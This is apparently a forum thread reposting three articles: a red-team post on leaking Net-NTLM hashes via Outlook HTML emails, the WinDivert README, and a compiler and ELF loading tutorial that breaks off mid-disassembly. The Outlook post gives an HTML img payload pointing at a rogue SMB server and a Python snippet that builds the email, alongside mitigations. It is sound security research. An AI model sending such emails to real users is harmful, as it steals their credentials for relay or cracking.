Abusing Microsoft Outlook to steal Net-NTLM hashes

Rather than using the CERT/CC technique - taking advantage of the possibility to embed OLE objects inside an RTF, DOC or PDF, which may make security software integrated with the e-mail server raise its eyebrows - this technique exploits Outlook's handling of HTML messages with images and the behavior described in the Bugtraq post of 1997. HTML e-mails with embedded images are very popular, especially in corporate environments, and are less likely to be screened or blocked by anti-virus software and e-mail gateways.

The Net-NTLM hashes will be leaked via SMB traffic to an external rogue SMB server, such as Responder (our tool of choice for the demo), Core Security's Impacket smbrelay or ntlmrelay, or even a custom SMB server. In a nutshell, the attack works by sending an e-mail to the victim in HTML format, with an image pointing to an external SMB server. The image can be, for example, an HTML-based e-mail signature. The client will automatically initiate an NTLM authentication against the rogue server, ultimately leaking its hashes.

From a victim's perspective, depending on how Outlook is configured to render images in HTML e-mails, there may in some cases be an alert about opening external content, and this may hint at abnormal behavior. Nevertheless, having to click through a warning to render an image is a common occurrence for many Outlook users, so this does not pose a strong obstacle to this exploitation vector.
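The booby-trapped message described above is trivial to assemble with any mail library. Here is a sketch using Python's standard email package (the addresses and the 10.30.1.23 SMB server IP are placeholders, and delivery via smtplib is left commented out):

```python
from email.mime.text import MIMEText

# HTML body whose image points at a rogue SMB server instead of a web host.
html = '<html><img src="file:///10.30.1.23/test">Test NTLM leak via Outlook</html>'

msg = MIMEText(html, "html")
msg["From"] = "malicious-adversary@blazeinfosec.com"   # placeholder sender
msg["To"] = "victim@blazeinfosec.com"                  # placeholder recipient
msg["Subject"] = "Quarterly figures"

raw = msg.as_string()
# import smtplib
# smtplib.SMTP("mail.example.org").send_message(msg)   # hypothetical relay
```

When the recipient's Outlook renders this text/html part, the image fetch triggers the SMB authentication against the rogue server.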
Sometimes we have also noticed a very quick pop-up before fetching content from the remote SMB server on slower connections, also a regular occurrence that is unlikely to raise suspicion. Frequently Outlook is configured to render images automatically when the sender is trusted - a common trust relationship being when the sender is internal to the organization. For instance, sending an HTML e-mail with an <img> tag pointing to a rogue SMB server from malicious-adversary@blazeinfosec.com to victim@blazeinfosec.com will make the Outlook client of victim@blazeinfosec.com render the e-mail automatically and leak NTLM hashes. This can be useful in a scenario where a penetration tester or red teamer has compromised a single e-mail account in the target organization and uses it to compromise other users, individually or en masse, by sending the booby-trapped e-mail to a distribution list.

Even though in some situations this technique is not as silent as the one described by Will Dormann, it has proved to be very effective in many of our engagements and should be in your attack toolbox. It is worth remembering that Net-NTLM hashes cannot be used in pass-the-hash attacks, unlike pure NTLM hashes, but they can be relayed (under some circumstances) [9] or cracked using off-the-shelf tools like hashcat.

Exploitation steps

Even though all it takes to exploit the issue is the ability to send an HTML e-mail, meaning it is possible to use any e-mail client or even a script to automate this attack, in this section we will describe how to achieve it using Microsoft Outlook itself.

1) Create an HTML file with the following content:

<html>
<img src="file:///10.30.1.23/test">Test NTLM leak via Outlook
</html>

The IP address above is for illustration only and was used in our labs. It can be any IP or hostname, including remote addresses.

2) Create an e-mail message to the target. Add the HTML payload as an attachment, but using the option "Insert as Text" so it will create the e-mail message as HTML.
3) The victim opens the e-mail without any further interaction.

4) The target's Net-NTLM hashes are automatically captured by our Responder.

An important requirement for this exploit to work is obviously the ability of the target to connect to the attacker's SMB server on port 445. Some ISPs block this port by default, while many others do not. Interestingly enough, Microsoft maintains a small list [7] of ISPs that do not filter outbound access to port 445.

Preventing the issue

Once again, the problem described in this post is a design decision of Windows, and for over 20 years it has been known that it can be abused in a myriad of scenarios. There are a couple of different ways to reduce the impact brought by this insecure behavior.

Setting to 2 the value of the registry key RestrictSendingNTLMTraffic under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 will reduce the exposure to this risk, as Windows will no longer send NTLMv1 or NTLMv2 hashes when challenged by a server, whether it is legitimate or rogue. However, it is likely to break functionality and single sign-on mechanisms, especially in corporate networks that heavily rely on NTLM authentication.

Back in 2017, without much advertisement, Microsoft also released a mitigation [4] for Windows 10 and Windows Server 2016 that prevents NTLM SSO authentication with resources that are not marked as internal by the Windows Firewall, denying NTLM SSO authentication for public resources and ultimately limiting the exposure of Net-NTLM hashes when challenged by external services like an attacker-operated SMB server. This feature is not activated by default and a user has to opt in by explicitly applying changes to the registry.
From a network security perspective, the adverse effect of this weakness can be mitigated by defining firewall rules that disallow SMB connections to non-whitelisted external servers, or better yet by blocking all external SMB connections altogether, if that can be considered an option.

Conclusion

There are security risks related to NTLM authentication that are frequently overlooked, despite having been known for over two decades now. Exploiting these issues is trivial and poses a serious risk to an organization, especially from an insider threat point of view or in a compromised account scenario. Preventing this issue is not trivial, but it may be helped by some of the latest Microsoft patches and other carefully thought-out strategies to restrict NTLM traffic. Maybe one day Microsoft will release a patch or a service pack that will prevent Windows from leaking NTLM hashes all over the place.

References

[1] https://insights.sei.cmu.edu/cert/2018/04/automatically-stealing-password-hashes-with-microsoft-outlook-and-ole.html
[2] https://blog.blazeinfosec.com/leveraging-web-application-vulnerabilities-to-steal-ntlm-hashes-2/
[3] http://insecure.org/sploits/winnt.automatic.authentication.html
[4] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170014
[5] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook/
[6] https://medium.com/@ValdikSS/deanonymizing-windows-users-and-capturing-microsoft-and-vpn-accounts-f7e53fe73834
[7] http://witch.valdikss.org.ru/
[8] https://social.technet.microsoft.com/wiki/contents/articles/32346.azure-summary-of-isps-that-allow-disallow-access-from-port-445.aspx
[9] https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

Sursa: https://blog.blazeinfosec.com/love-letters-from-the-red-team-from-e-mail-to-ntlm-hashes-with-microsoft-outlook/
-
-
-
-
WinDivert 2.0: Windows Packet Divert
====================================

1. Introduction
---------------

Windows Packet Divert (WinDivert) is a user-mode packet interception library for Windows 7, Windows 8 and Windows 10.

WinDivert enables user-mode capturing/modifying/dropping of network packets sent to/from the Windows network stack. In summary, WinDivert can:

- capture network packets
- filter/drop network packets
- sniff network packets
- (re)inject network packets
- modify network packets

WinDivert can be used to implement user-mode packet filters, sniffers, firewalls, NATs, VPNs, IDSs, tunneling applications, etc.

WinDivert supports the following features:

- packet interception, sniffing, or dropping modes
- support for loopback (localhost) traffic
- full IPv6 support
- network layer
- simple yet powerful API
- high-level filtering language
- filter priorities
- freely available under the terms of the GNU Lesser General Public License (LGPLv3)

For more information see doc/windivert.html

2. Architecture
---------------

The basic architecture of WinDivert is as follows:

                        +-----------------+
                        |                 |
               +------->|     PROGRAM     |--------+
               |        | (WinDivert.dll) |        |
               |        +-----------------+        |
               |                                   |
      (2a) matching                       (3) re-injected
           packet                             packet
               |                                   |
 [user mode]   |                                   |
 ..............|...................................|................
 [kernel mode] |                                   |
               |                                   v
            +--+------------+
 (1)        |               |  (2b) non-matching packet
 packet --->| WinDivert.sys |----------------------------------->
            +---------------+

The WinDivert.sys driver is installed below the Windows network stack. The following actions occur:

(1) A new packet enters the network stack and is intercepted by WinDivert.sys.
(2a) If the packet matches the PROGRAM-defined filter, it is diverted. The PROGRAM can then read the packet using a call to WinDivertRecv().
(2b) If the packet does not match the filter, the packet continues as normal.
(3) The PROGRAM either drops, modifies, or re-injects the packet. The PROGRAM can re-inject the (modified) packet using a call to WinDivertSend().

3. License
----------

WinDivert is dual-licensed under your choice of the GNU Lesser General Public License (LGPL) Version 3 or the GNU General Public License (GPL) Version 2. See the LICENSE file for more information.

4. About
--------

WinDivert was written by basil. For further information, or bug reports, please contact:

basil@reqrypt.org

The homepage for WinDivert is:
https://reqrypt.org/windivert.html

The source code for WinDivert is hosted by GitHub at:
https://github.com/basil00/Divert

Sursa: https://github.com/basil00/Divert
-
Life of a binary

Written on April 15th, 2017 by Kishu Agarwal

Almost every one of you must have written a program, compiled it and then run it to see the fruits of your hard labour. It feels good to finally see your program working, isn't it? But to make all of this work, we have someone else to be thankful to as well. And that is your compiler (of course, assuming that you are working in a compiled language, not an interpreted one), which also does so much hard work behind the scenes.

In this article, I will try to show you how the source code that you write is transformed into something that your machine is actually able to run. I am choosing Linux as my host machine and C as the programming language here, but the concepts are general enough to apply to many compiled languages out there.

Note: If you want to follow along in this article, then you will have to make sure that you have gcc and elfutils installed on your local machine.

Let's start with a simple C program and see how it gets converted by the compiler.

#include <stdio.h>

// Main function
int main(void)
{
    int a = 1;
    int b = 2;
    int c = a + b;
    printf("%d\n", c);
    return 0;
}

This program creates two variables, adds them up and prints the result on the screen. Pretty simple, huh? But let's see what this seemingly simple program has to go through to finally get executed on your system.

The compiler usually has the following five steps (with the last step being part of the OS):

1. Preprocessing
2. Compilation
3. Assembly
4. Linking
5. Loading

Let's go through each of the steps in sufficient detail.
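Each of the compiler-side stages can be stopped at with a gcc flag. As a quick reference, here is the mapping (a Python dict purely for presentation, using the exact commands that appear later in the article; Loading has no flag since the OS performs it):

```python
# Which gcc invocation stops after each stage, and what it produces.
stages = {
    "preprocessing": ("gcc -E sample.c", "expanded source on stdout"),
    "compilation":   ("gcc -S sample.c", "sample.s assembly file"),
    "assembly":      ("gcc -c sample.c", "sample.o object file"),
    "linking":       ("gcc sample.c",    "a.out executable"),
}

for stage, (command, produces) in stages.items():
    print(f"{stage:13s} {command:17s} -> {produces}")
```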
[Stage diagram: Preprocessing]

The first step is the Preprocessing step, which is done by the Preprocessor. The job of the Preprocessor is to handle all the preprocessor directives present in your code. These directives start with #. But before it processes them, it first removes all the comments from the code, as comments are there only for human readability. Then it finds all the # commands and does what the commands say. In the code above, we have just used the #include directive, which simply tells the Preprocessor to copy the stdio.h file and paste it into this file at the current location.

You can see the output of the Preprocessor by passing the -E flag to the gcc compiler.

gcc -E sample.c

You would get something like the following:

# 1 "sample.c"
# 1 "<built-in>"
# 1 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "<command-line>" 2
# 1 "sample.c"
# 1 "/usr/include/stdio.h" 1 3 4
-----omitted-----
# 5 "sample.c"
int main(void)
{
    int a = 1;
    int b = 2;
    int c = a + b;
    printf("%d\n", c);
    return 0;
}

[Stage diagram: Compilation]

Confusingly, the second step is also called compilation. The compiler takes the output from the Preprocessor and is responsible for the following important tasks.

Pass the output through a lexical analyser to identify the various tokens present in the file. Tokens are just literals present in your program, like 'int', 'return', 'void', '0' and so on.
The lexical analyser also associates with each token its type: whether the token is a string literal, integer, float, if-token, and so on.

Pass the output of the lexical analyser to the syntax analyser to check whether the program is written in a way that satisfies the grammar rules of the language it is written in. For example, it will raise a syntax error when parsing this line of code, b = a + ;, since + is missing one operand.

Pass the output of the syntax analyser to the semantic analyser, which checks whether the program satisfies the semantics of the language, like type checking and that variables are declared before their first usage, etc.

If the program is syntactically correct, then the source code is converted into the assembly instructions for the specified target architecture. By default, it generates assembly for the machine it is running on. But suppose you are building programs for embedded systems; then you can pass the architecture of the target machine and gcc will generate assembly for that machine.

To see the output from this stage, pass the -S flag to the gcc compiler.

gcc -S sample.c

You would get something like the following, depending upon your environment.
    .file   "sample.c"                // name of the source file
    .section    .rodata               // read-only data
.LC0:                                 // local constant
    .string "%d\n"                    // string constant we used
    .text                             // beginning of the code segment
    .globl  main                      // declare main symbol to be global
    .type   main, @function           // main is a function
main:                                 // beginning of main function
.LFB0:                                // local function beginning
    .cfi_startproc                    // ignore them
    pushq   %rbp                      // save the caller's frame pointer
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq    %rsp, %rbp                // set the current stack pointer as the frame base pointer
    .cfi_def_cfa_register 6
    subq    $16, %rsp                 // set up the space
    movl    $1, -12(%rbp)
    movl    $2, -8(%rbp)
    movl    -12(%rbp), %edx
    movl    -8(%rbp), %eax
    addl    %edx, %eax
    movl    %eax, -4(%rbp)
    movl    -4(%rbp), %eax
    movl    %eax, %esi
    movl    $.LC0, %edi
    movl    $0, %eax
    call    printf
    movl    $0, %eax
    leave
    .cfi_def_cfa 7, 8
    ret                               // return from the function
    .cfi_endproc
.LFE0:
    .size   main, .-main              // size of the main function
    .ident  "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609"
    .section    .note.GNU-stack,"",@progbits  // make stack non-executable

If you don't know assembly language, it all looks pretty scary at first, but it is not that bad. It takes more time to understand assembly code than your normal high-level language code, but given enough time, you can surely read it. Let's see what this file contains.

All the lines beginning with '.' are assembler directives. .file denotes the name of the source file, which can be used for debugging purposes. The string literal in our source code, %d\n, now resides in the .rodata section (ro means read-only), since it is a read-only string. The compiler named this string LC0, to later refer to it in the code. Whenever you see a label starting with .L, it means that the label is local to the current file and will not be visible to other files. .globl tells that main is a global symbol, which means that main can be called from other files.
.type tells that main is a function. Then follows the assembly for the main function. You can ignore the directives starting with cfi; they are used for call stack unwinding in case of exceptions. We will ignore them in this article, but you can learn more about them here.

Let's now try to understand the disassembly of the main function.

[Fig. 1: the stack before the main function call, with rsp and rbp at some address X. Fig. 2: after the caller's frame pointer is saved (rbp pushed, rsp moved into rbp). Fig. 3: local variables a, b and c stored at rbp-12, rbp-8 and rbp-4.]

Line 11: You must know that when you call a function, a new stack frame is created for that function. To make that possible, we need some way of knowing the start of the caller's frame when the new function returns. That's why we push the current frame pointer, which is stored in the rbp register, onto the stack.

Line 14: Move the current stack pointer into the base pointer. This becomes our current function frame pointer. Fig. 1 depicts the state before pushing the rbp register, and Fig. 2 shows the state after the previous frame pointer is pushed and the stack pointer is moved to the current frame pointer.

Line 16: We have 3 local variables in our program, all of type int. On my machine, each int occupies 4 bytes, so we need 12 bytes of space on the stack to hold our local variables. The way we create space for our local variables on the stack is to decrement our stack pointer by the number of bytes we need for our local variables.
Decrement, because the stack grows from higher addresses to lower addresses. But here you see we are decrementing by 16 instead of 12. The reason is that space is allocated in chunks of 16 bytes. So even if you have 1 local variable, a space of 16 bytes would be allocated on the stack. This is done for performance reasons on some architectures. See Fig. 3 for how the stack is laid out right now.

Lines 17-22: This code is pretty straightforward. The compiler has used the slot rbp-12 as the storage for variable a, rbp-8 for b and rbp-4 for c. It moves the values 1 and 2 to the addresses of variables a and b respectively. To prepare for the addition, it moves the value of b to the edx register and the value of a to the eax register. The result of the addition is stored in the eax register, which is later transferred to the address of the c variable.

Lines 23-27: Then we prepare for our printf call. First, the value of the c variable is moved to the esi register, and then the address of our string constant %d\n is moved to the edi register. esi and edi now hold the arguments of our printf call: edi holds the first argument and esi the second. Then we call the printf function to print the value of the variable c formatted as an integer value. A point to note here is that the printf symbol is undefined at this point. We will see how this printf symbol gets resolved later on in this article.

.size tells the size of the main function in bytes. ".-main" is an expression where the . symbol means the address of the current line. So this expression evaluates to the current address of the line minus the address of the main function, which gives us the size of the main function in bytes.

.ident just tells the assembler to add the following line to the .comment section.

.note.GNU-stack is used for telling whether the stack for this program is executable or not. Mostly the value for this directive is the null string, which tells that the stack is not executable.
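The subq $16, %rsp for 12 bytes of locals follows from this rounding rule. A quick sketch of the arithmetic (the 16-byte chunk size is what gcc did for our main() here, not a universal constant across all targets):

```python
def stack_reservation(local_bytes, chunk=16):
    # Round the local-variable footprint up to the next multiple
    # of the allocation chunk, as gcc did for our main().
    return ((local_bytes + chunk - 1) // chunk) * chunk

assert stack_reservation(12) == 16   # three 4-byte ints -> subq $16, %rsp
assert stack_reservation(4) == 16    # even one int reserves a whole chunk
assert stack_reservation(20) == 32   # five ints would need a second chunk
```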
[Stage diagram: Assembly]

What we have right now is our program in assembly language, but that is still a language not understood by the processor. We have to convert the assembly language into machine language, and that work is done by the Assembler. The Assembler takes your assembly file and produces an object file, which is a binary file containing the machine instructions for your program. Let's convert our assembly file to an object file to see the process in action. To get the object file for your program, pass the -c flag to the gcc compiler.

gcc -c sample.c

You would get an object file with an extension of .o. Since this is a binary file, you won't be able to open it in a normal text editor to view its contents. But we have tools at our disposal to find out what is lying inside those object files.

Object files can have many different file formats. We will be focussing on one in particular, which is used on Linux: the ELF file format. ELF files contain the following information:

- ELF Header
- Program header table
- Section header table
- Some other data referred to by the previous tables

The ELF Header contains some meta information about the object file, such as the type of the file, the machine against which the binary is made, the version, the size of the header, etc. To view the header, just pass the -h flag to the eu-readelf utility.
$ eu-readelf -h sample.o
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF64
  Data:                              2's complement, little endian
  Ident Version:                     1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              REL (Relocatable file)
  Machine:                           AMD x86-64
  Version:                           1 (current)
  Entry point address:               0
  Start of program headers:          0 (bytes into file)
  Start of section headers:          704 (bytes into file)
  Flags:
  Size of this header:               64 (bytes)
  Size of program header entries:    0 (bytes)
  Number of program headers entries: 0
  Size of section header entries:    64 (bytes)
  Number of section headers entries: 13
  Section header string table index: 10

From the above listing, we see that this file doesn't have any Program Headers, and that is fine. Program Headers are only present in executable files and shared libraries. We will see Program Headers when we link the file in the next step. But we do have 13 sections. Let's see what these sections are. Use the -S flag.
$ eu-readelf -S sample.o
There are 13 section headers, starting at offset 0x2c0:

Section Headers:
[Nr] Name            Type     Addr             Off      Size     ES Flags Lk Inf Al
[ 0]                 NULL     0000000000000000 00000000 00000000  0        0  0  0
[ 1] .text           PROGBITS 0000000000000000 00000040 0000003c  0 AX     0  0  1
[ 2] .rela.text      RELA     0000000000000000 00000210 00000030 24 I     11  1  8
[ 3] .data           PROGBITS 0000000000000000 0000007c 00000000  0 WA     0  0  1
[ 4] .bss            NOBITS   0000000000000000 0000007c 00000000  0 WA     0  0  1
[ 5] .rodata         PROGBITS 0000000000000000 0000007c 00000004  0 A      0  0  1
[ 6] .comment        PROGBITS 0000000000000000 00000080 00000035  1 MS     0  0  1
[ 7] .note.GNU-stack PROGBITS 0000000000000000 000000b5 00000000  0        0  0  1
[ 8] .eh_frame       PROGBITS 0000000000000000 000000b8 00000038  0 A      0  0  8
[ 9] .rela.eh_frame  RELA     0000000000000000 00000240 00000018 24 I     11  8  8
[10] .shstrtab       STRTAB   0000000000000000 00000258 00000061  0        0  0  1
[11] .symtab         SYMTAB   0000000000000000 000000f0 00000108 24      12  9  8
[12] .strtab         STRTAB   0000000000000000 000001f8 00000016  0        0  0  1

You don't need to understand the whole of the above listing. But essentially, for each section it lists various information, like the name of the section, the size of the section and the offset of the section from the start of the file. The important sections for our use are the following:

- The .text section contains our machine code.
- The .rodata section contains the read-only data in our program. It may be constants or string literals that you may have used in your program. Here it just contains %d\n.
- The .data section contains the initialized data of our program. Here it is empty, since we don't have any initialized data.
- The .bss section is like the .data section but contains the uninitialized data of our program. Uninitialized data could be an array declared like int arr[100], which becomes part of this section.
One point to note about the .bss section is that, unlike the other sections, which occupy space depending upon their content, the .bss section just contains the size of the section and nothing else. The reason is that at load time, all that is needed is the count of bytes to allocate in this section. In this way we reduce the size of the final executable.

- The .strtab section lists all the strings contained in our program.
- The .symtab section is the symbol table. It contains all the symbols (variable and function names) of our program.
- The .rela.text section is the relocation section. More about this later.

You can also view the contents of these sections; just pass the corresponding section number to the eu-readelf program. You can also use the objdump tool, which can additionally provide you with the disassembly of some of the sections.

Let's talk in a little more detail about the rela.text section. Remember the printf function that we used in our program? Now, printf is something that we haven't defined ourselves; it is part of the C library. Normally when you compile your C programs, the compiler will compile them in a way so that the C functions you call are not bundled in with your executable, which reduces the size of the final executable. Instead, a table is made of all those symbols, called a relocation table, which is later filled in by something called the loader. We will discuss more about the loader later on, but for now, the important thing is that if you look at the rela.text section, you will find the printf symbol listed there. Let's confirm that here.
$ eu-readelf -r sample.o

Relocation section [ 2] '.rela.text' for section [ 1] '.text' at offset 0x210 contains 2 entries:
  Offset              Type         Value               Addend Name
  0x0000000000000027  X86_64_32    000000000000000000      +0 .rodata
  0x0000000000000031  X86_64_PC32  000000000000000000      -4 printf

Relocation section [ 9] '.rela.eh_frame' for section [ 8] '.eh_frame' at offset 0x240 contains 1 entry:
  Offset              Type         Value               Addend Name
  0x0000000000000020  X86_64_PC32  000000000000000000      +0 .text

You can ignore the second relocation section, .rela.eh_frame. It has to do with exception handling, which is not of much interest to us here. Let's look at the first section. There we can see two entries, one of which is our printf symbol. What this entry means is that there is a symbol used in this file with the name printf that has not been defined, and that symbol is located in this file at offset 0x31 from the start of the .text section. Let's check what is at offset 0x31 right now in the .text section.

$ eu-objdump -d -j .text sample.o
sample.o: elf64-elf_x86_64

Disassembly of section .text:
   0: 55                    push  %rbp
   1: 48 89 e5              mov   %rsp,%rbp
   4: 48 83 ec 10           sub   $0x10,%rsp
   8: c7 45 f4 01 00 00 00  movl  $0x1,-0xc(%rbp)
   f: c7 45 f8 02 00 00 00  movl  $0x2,-0x8(%rbp)
  16: 8b 55 f4              mov   -0xc(%rbp),%edx
  19: 8b 45 f8              mov   -0x8(%rbp),%eax
  1c: 01 d0                 add   %edx,%eax
  1e: 89 45 fc              mov   %eax,-0x4(%rbp)
  21: 8b 45 fc              mov   -0x4(%rbp),%eax
  24: 89 c6                 mov   %eax,%esi
  26: bf 00 00 00 00        mov   $0x0,%edi
  2b: b8 00 00 00 00        mov   $0x0,%eax
  30: e8 00 00 00 00        callq 0x35    <<<<<< offset 0x31
  35: b8 00 00 00 00        mov   $0x0,%eax
  3a: c9                    leaveq
  3b: c3                    retq

Here you can see the call instruction at offset 0x30. e8 is the opcode of the call instruction, followed by the 4 bytes from offset 0x31 to 0x34, which should correspond to the actual address of our printf function. We don't have that address right now, so they are just 00's.
(Later on, we will see that this location doesn't actually hold the printf address, but calls it indirectly using something called the PLT. We will cover this part later.)

[Diagram: Preprocessing → Compilation → Assembly → Linking → Loading]

Everything that we have done until now has worked on a single source file. But in reality, that is rarely the case. In real production code, you have hundreds or thousands of source files which you need to compile into an executable. How do the steps we followed so far compare in that case? Well, the steps all remain the same. All the source files individually get preprocessed, compiled and assembled, and we get separate object files at the end. No source file is written in isolation, though: there are functions and global variables defined in one file and used at different locations in other files. It is the job of the linker to gather all the object files, go through each of them and track which symbols each file defines and which symbols it uses. It finds all this information in the symbol table of each object file. After gathering this information, the linker creates a single object file, combining the sections from each of the individual object files into their corresponding sections, and relocates all the symbols that can be resolved. In our case, we don't have a collection of source files, just one, but since we use the printf function from the C library, our program will be dynamically linked with the C library. Let's now link our program and further investigate the output.

gcc sample.c

I won't go into much detail here, since the output is also an ELF file like the one we saw above, with just some new sections.
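The linker's bookkeeping described above can be modeled in a few lines. This is only a toy illustration (file names and symbols are invented), not how ld is actually implemented:

```python
# Toy linker pass: each "object file" declares which symbols it defines and
# which it uses; matching uses against definitions leaves the symbols that
# must come from shared libraries at dynamic link time.
objects = {
    "main.o": {"defines": {"main"}, "uses": {"add", "printf"}},
    "add.o":  {"defines": {"add"},  "uses": set()},
}

defined = set().union(*(o["defines"] for o in objects.values()))
used = set().union(*(o["uses"] for o in objects.values()))
unresolved = used - defined

# printf is used but defined nowhere among our objects -> it stays in the
# relocation table and is resolved later against libc
assert unresolved == {"printf"}
```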
One thing to note here: when we saw the object file we got from the assembler, the addresses in it were relative. But after linking all the files, we have a pretty good idea of where all the pieces go, and thus, if you examine the output of this stage, it also contains absolute addresses. At this stage, the linker has identified all the symbols that are used in our program, who uses those symbols, and who defines them. The linker simply maps the address of the definition of a symbol to each usage of that symbol. But after doing all this, there still exist some symbols that are not yet resolved, one of them being our printf symbol. In general, these are symbols which are externally defined variables or externally defined functions. The linker also creates a relocation table, just as the assembler did, holding the entries which are still unresolved.

At this point, there is one thing you should know. The functions and data you use from other libraries can be statically linked or dynamically linked. Static linking means that the functions and data from those libraries are copied into your executable. With dynamic linking, those functions and data are not copied into your executable, thus reducing its final size. For a library to support dynamic linking against it, the library must be a shared library (.so file). The common libraries used by many programs usually come as shared libraries, and one of them is our libc. libc is used by so many programs that if every program statically linked against it, at any point in time there would be many copies of the same code occupying space in your memory. Dynamic linking solves this problem: at any moment only one copy of libc occupies memory, and all running programs reference that shared copy.
To make dynamic linking possible, the linker creates two more sections that weren't there in the object code generated by the assembler: the .plt (Procedure Linkage Table) and .got (Global Offset Table) sections. We will cover these sections when we come to loading our executable, as that is where they become useful.

[Diagram: Preprocessing → Compilation → Assembly → Linking → Loading]

Now it is time to actually run our executable file. When you click on the file in your GUI, or run it from the command line, the execve system call is invoked indirectly. It is in this system call that the kernel starts the work of loading your executable into memory. Remember the Program Header Table from above? This is where it becomes very useful.

$ eu-readelf -l a.out
Program Headers:
  Type          Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  PHDR          0x000040 0x0000000000400040 0x0000000000400040 0x0001f8 0x0001f8 R E 0x8
  INTERP        0x000238 0x0000000000400238 0x0000000000400238 0x00001c 0x00001c R   0x1
        [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
  LOAD          0x000000 0x0000000000400000 0x0000000000400000 0x000724 0x000724 R E 0x200000
  LOAD          0x000e10 0x0000000000600e10 0x0000000000600e10 0x000228 0x000230 RW  0x200000
  DYNAMIC       0x000e28 0x0000000000600e28 0x0000000000600e28 0x0001d0 0x0001d0 RW  0x8
  NOTE          0x000254 0x0000000000400254 0x0000000000400254 0x000044 0x000044 R   0x4
  GNU_EH_FRAME  0x0005f8 0x00000000004005f8 0x00000000004005f8 0x000034 0x000034 R   0x4
  GNU_STACK     0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
  GNU_RELRO     0x000e10 0x0000000000600e10 0x0000000000600e10 0x0001f0 0x0001f0 R   0x1

 Section to Segment mapping:
  Segment Sections...
  00
  01      [RO: .interp]
  02      [RO: .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame]
  03      [RELRO: .init_array .fini_array .jcr .dynamic .got] .got.plt .data .bss
  04      [RELRO: .dynamic]
  05      [RO: .note.ABI-tag .note.gnu.build-id]
  06      [RO: .eh_frame_hdr]
  07
  08      [RELRO: .init_array .fini_array .jcr .dynamic .got]

How would the kernel know where to find this table in the file? That information is in the ELF header, which always starts at offset 0 in the file. Having done that, the kernel looks up all the entries of type LOAD and loads them into the memory space of the process. As you can see from the listing above, there are two entries of type LOAD. You can also see which sections are contained in each segment.

Modern operating systems and processors manage memory in terms of pages. Your computer's memory is divided into fixed-size chunks, and when a process asks for memory, the operating system allots it some number of pages. Apart from managing memory efficiently, this also has the benefit of providing security: the operating system can set protection bits for each page. Protection bits specify whether a particular page is read-only, writable or executable. A page marked read-only cannot be modified, which prevents intentional or unintentional modification of data. Read-only pages have another benefit: multiple running processes of the same program can share the same pages. Since the pages are read-only, no process can modify them, and every process still works just fine. To set up these protection bits, we somehow have to tell the kernel which pages have to be marked read-only and which can be written and executed.
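You can observe page protection from user space. The following Python sketch (Unix-only, since mmap's prot argument is not available on Windows) maps one writable and one read-only anonymous page and shows that writes to the read-only page are refused:

```python
import mmap

PAGE = mmap.PAGESIZE

# anonymous read/write page: writes succeed
rw = mmap.mmap(-1, PAGE)
rw[0:5] = b"hello"

# anonymous read-only page: CPython refuses to modify it
ro = mmap.mmap(-1, PAGE, prot=mmap.PROT_READ)
try:
    ro[0:1] = b"x"
    writable = True
except TypeError:   # "mmap can't modify a readonly memory map"
    writable = False

assert rw[0:5] == b"hello"
assert writable is False
```

This is the same mechanism the kernel applies when it maps the R E and RW LOAD segments: the protection travels with the page, not with the data.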
This information is stored in the flags of each of the entries above. Notice the first LOAD entry. It is marked R and E, which means this segment can be read and executed but not modified. If you look down and see which sections fall in this segment, you find two familiar ones: .text and .rodata. Thus our code and read-only data can only be read and executed, never modified, which is exactly what should happen. Similarly, the second LOAD entry contains the initialized and uninitialized data and the GOT (more on this later), and is marked RW, so it can be read and written but not executed.

After loading these segments and setting up their permissions, the kernel checks whether there is an INTERP segment. In a statically linked executable there is no need for this segment, since the executable contains all the code it needs, but for a dynamically linked executable this segment is important. It contains the .interp section, which holds the path to the dynamic linker. (You can check that there is no INTERP segment in a statically linked executable by passing the -static flag to gcc and inspecting the program header table of the resulting executable.) In our case the kernel finds one, and it points to the dynamic linker at /lib64/ld-linux-x86-64.so.2. Just as with our executable, the kernel loads this shared object by reading its header, finding its segments and loading them into the memory space of our current program. In a statically linked executable, where all this is not needed, the kernel would hand control directly to our program; here, the kernel gives control to the dynamic linker and pushes the address of our main function onto the stack, so that after the dynamic linker finishes its job, it knows where to hand over control.
We should now understand the two tables we have been skipping over for too long: the Procedure Linkage Table (PLT) and the Global Offset Table (GOT), as these are closely related to the workings of the dynamic linker. There are two types of relocations your program may need: variable relocations and function relocations. For an externally defined variable, we include an entry in the GOT; for externally defined functions, we include entries in both tables. So, essentially, the GOT has entries for all externally defined variables as well as functions, while the PLT has entries only for functions. The reason why functions get two entries will become clear from the following example. Let us take the printf function to see how these tables work. In our main function, look at the call instruction to printf:

400556: e8 a5 fe ff ff    callq 0x400400

This call instruction calls an address which is part of the .plt section. Let's see what is there.

$ objdump -d -j .plt a.out

a.out: file format elf64-x86-64

Disassembly of section .plt:

00000000004003f0 <printf@plt-0x10>:
  4003f0: ff 35 12 0c 20 00    pushq 0x200c12(%rip)   # 601008 <_GLOBAL_OFFSET_TABLE_+0x8>
  4003f6: ff 25 14 0c 20 00    jmpq *0x200c14(%rip)   # 601010 <_GLOBAL_OFFSET_TABLE_+0x10>
  4003fc: 0f 1f 40 00          nopl 0x0(%rax)

0000000000400400 <printf@plt>:
  400400: ff 25 12 0c 20 00    jmpq *0x200c12(%rip)   # 601018 <_GLOBAL_OFFSET_TABLE_+0x18>
  400406: 68 00 00 00 00       pushq $0x0
  40040b: e9 e0 ff ff ff       jmpq 4003f0 <_init+0x28>

0000000000400410 <__libc_start_main@plt>:
